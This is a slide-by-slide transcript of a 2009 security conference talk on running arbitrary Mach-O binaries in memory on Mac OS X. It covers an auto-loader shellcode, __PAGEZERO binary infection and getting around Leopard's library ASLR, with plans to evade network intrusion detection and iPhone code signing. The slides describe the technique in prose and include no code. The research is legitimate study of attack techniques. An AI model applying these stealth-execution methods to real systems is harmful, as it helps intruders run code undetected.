bh dc09
TRANSCRIPT
![Page 2: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/2.jpg)
Who am I?
• Student at Politecnico di Milano.
• Security Consultant at Secure Network
srl.
• Reverse Engineer at Zynamics GmbH.
03/08/2010
2
![Page 3: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/3.jpg)
Goal of the talk
03/08/2010
3
In-memory execution of arbitrary binaries
on a Mac OS X machine.
![Page 4: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/4.jpg)
Talk outline
• Mach-O file structure
• XNU binary execution
• Attack technique
• Defeat ASLR on libraries to enhance
the attack
03/08/2010
4
![Page 5: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/5.jpg)
Talk outline
• Mach-O file structure
• XNU binary execution
• Attack technique
• Defeat ASLR on libraries to enhance
the attack
03/08/2010
5
![Page 6: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/6.jpg)
Mach-O file
• Header structure: information on the target
architecture and options to interpret the file.
• Load commands: symbol table location,
registers state.
• Segments: define region of the virtual
memory, contain sections with code or data.
03/08/2010
6
![Page 7: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/7.jpg)
Segment and Sections
segment
Virtual address 0x1000
Virtual memory size
0x1000
File Offset
0x0
File Size
0x1000
section
Virtual Address 0x1d54
Virtual memory size
0x275
File Offset
0xd54
03/08/2010
7
![Page 8: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/8.jpg)
Important segments
• __PAGEZERO, if a piece of code accesses
NULL it lands here. no protection flags.
• __TEXT, holds code and read-only data. RX
protection.
• __DATA, holds data. RW protection.
• __LINKEDIT, holds information for the
dynamic linker including symbol and string
tables. RW protection.
03/08/2010
8
![Page 9: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/9.jpg)
Mach-O representation
03/08/2010
9
![Page 10: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/10.jpg)
Talk outline
• Mach-O file structure
• XNU binary execution
• Attack technique
• Defeat ASLR on libraries to enhance
the attack
03/08/2010
10
![Page 11: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/11.jpg)
Binary execution
• Conducted by the kernel and the
dynamic linker.
• The kernel, when finishes his part,
jumps to the dynamic linker entry point.
• The dynamic linker is not randomized.
03/08/2010
11
![Page 12: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/12.jpg)
Execution steps
Kernel
• Maps the dynamic linker
in the process address
space.
• Parses the header
structure and loads all
segments.
• Creates a new stack.
Dynamic linker
• Retrieves base address
of the binary.
• Resolves symbols.
• Resolves library
dependencies.
• Jumps to the binary entry
point.
03/08/2010
12
![Page 13: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/13.jpg)
Stack
• Mach-O file base address.
• Command line arguments.
• Environment variables.
• Execution path.
• All padded.
03/08/2010
13
![Page 14: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/14.jpg)
Stack representation
03/08/2010
14
![Page 15: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/15.jpg)
Talk outline
• Mach-O file structure
• XNU binary execution
• Attack technique
• Defeat ASLR on libraries to enhance
the attack
03/08/2010
15
![Page 16: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/16.jpg)
Proposed attack
• Userland-exec attack.
• Encapsulate a shellcode, aka auto-
loader, and a crafted stack in the
injected binary.
• Execute the auto-loader in the address
space of the attacked process.
03/08/2010
16
![Page 17: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/17.jpg)
WWW
• Who: an attacker with a remote code
execution in his pocket.
• Where: the attack is two-staged. First
run a shellcode to receive the binary,
then run the auto-loader contained in
the binary.
• Why: later in this talk.
03/08/2010
17
![Page 18: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/18.jpg)
What kind of binaries?
Any Mach-O file, from ls to Safari
03/08/2010
18
![Page 19: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/19.jpg)
A nice picture
03/08/2010
19
![Page 20: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/20.jpg)
Infected binary
• We need to find a place to store the
auto-loader and the crafted stack.
• __PAGEZERO infection technique.
• Cavity infector technique.
03/08/2010
20
![Page 21: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/21.jpg)
__PAGEZERO INFECTION
• Change __PAGEZERO protection flags
with a custom value.
• Store the crafted stack and the auto-
loader code at the end of the binary.
• Point __PAGEZERO to the crafted
stack.
• Overwrite the first bytes of the file with
the auto-loader address.
03/08/2010
21
![Page 22: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/22.jpg)
Binary layout
03/08/2010
22
![Page 23: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/23.jpg)
Auto-loader
• Impersonates the kernel.
• Un-maps the old binary.
• Maps the new one.
03/08/2010
23
![Page 24: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/24.jpg)
Auto-loader description
• Parses the binary.
• Reads the virtual addresses of the
injected binary segments.
• Unloads the attacked binary segments
pointed by the virtual addresses.
• Loads the injected binary segments.
03/08/2010
24
![Page 25: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/25.jpg)
Auto-loader description(2)
• Maps the crafted stack referenced by
__PAGEZERO.
• Cleans registers.
• Cleans some libSystem variables.
• Jumps to dynamic linker entry point.
03/08/2010
25
![Page 26: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/26.jpg)
We do like pictures, don’t we?
03/08/2010
26
TEXT DATA LINKEDIT SEGMENT
-N
TEXT DATA LINKEDIT SEGMENT-N
Victim’s process address space
![Page 27: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/27.jpg)
libSystem variables
• _malloc_def_zone_state
• _NXArgv_pointer
• _malloc_num_zones
• __keymgr_global
03/08/2010
27
![Page 28: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/28.jpg)
Why are those variables
important?
• They are used in the initialization of
malloc.
• Two of them are used for command line
arguments parsing.
• Not cleaning them will result in a crash.
03/08/2010
28
![Page 29: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/29.jpg)
Hunts the variables
• Mac OS X Leopard has ASLR for
libraries.
• Those variables are not exported.
• Cannot use dlopen()/dlsym() combo.
03/08/2010
29
![Page 30: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/30.jpg)
Talk outline
• Mach-O file structure
• XNU binary execution
• Attack technique
• Defeat ASLR on libraries to enhance
the attack
03/08/2010
30
![Page 31: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/31.jpg)
Defeat ASLR
• Retrieve libSystem in-memory base
address.
• Read symbols from the libSystem
binary.
• Adjust symbols to the new address.
03/08/2010
31
![Page 32: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/32.jpg)
How ASLR works in Leopard
• Only libraries are randomized.
• The randomization is performed
whenever the system or the libraries are
updated.
• Library segments addresses are saved
in dyld_shared_cache_arch.map.
03/08/2010
32
![Page 33: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/33.jpg)
Retrieve libSystem address
• Parse
dyld_shared_cache
_i386.map and
search for libSystem
entry.
• Adopt functions
exported by the
dynamic linker and
perform the whole
task in-memory.
03/08/2010
33
![Page 34: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/34.jpg)
Dyld functions
• _dyld_image_count() used to retrieve the
number of linked libraries of a process.
• _dyld_get_image_header() used to retrieve
the base address of each library.
• _dyld_get_image_name() used to retrieve
the name of a given library.
03/08/2010
34
![Page 35: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/35.jpg)
Find ‘em
• Parse dyld load commands.
• Retrieve __LINKEDIT address.
• Iterate dyld symbol table and search for
the functions name in __LINKEDIT.
03/08/2010
35
![Page 36: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/36.jpg)
Back to libSystem
• Non-exported symbols are taken out
from the symbol table when loaded.
• Open libSystem binary, find the
variables in the symbol table.
• Adjust variables to the base address of
the in-memory __DATA segment.
03/08/2010
36
![Page 37: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/37.jpg)
Put pieces together
• Iterate the header structure of libSystem
in-memory and find the __DATA base
address.
– __DATA base address 0x2000
– Symbol at 0x2054
– In-memory __DATA base address 0x4000
– Symbol in-memory at 0x4054
03/08/2010
37
![Page 38: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/38.jpg)
Results
• Run a binary into an arbitrary machine.
• No traces on the hard-disk.
• No execve(), the kernel doesn’t know
about us.
• It works with every binary.
• It is possible to write payloads in a high
level language.
03/08/2010
38
![Page 39: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/39.jpg)
Demo description
• Run a simple piece of code which acts
like a shellcode and retrieve the binary.
• Execute the attack with nmap and
Safari.
• Show network dump.
• Show memory layout before and after
the attack.
03/08/2010
39
![Page 40: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/40.jpg)
DEMO
03/08/2010
40
![Page 41: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/41.jpg)
Future developments
• Employ encryption to avoid NIDS
detection.
• Using cavity infector technique.
• Port the code to iPhone to evade code
signing protection ( Catch you at BH
Europe).
03/08/2010
41
![Page 42: Bh dc09](https://reader034.vdocument.in/reader034/viewer/2022052507/558a4c39d8b42a69128b45d0/html5/thumbnails/42.jpg)
Thanks, questions?
03/08/2010
42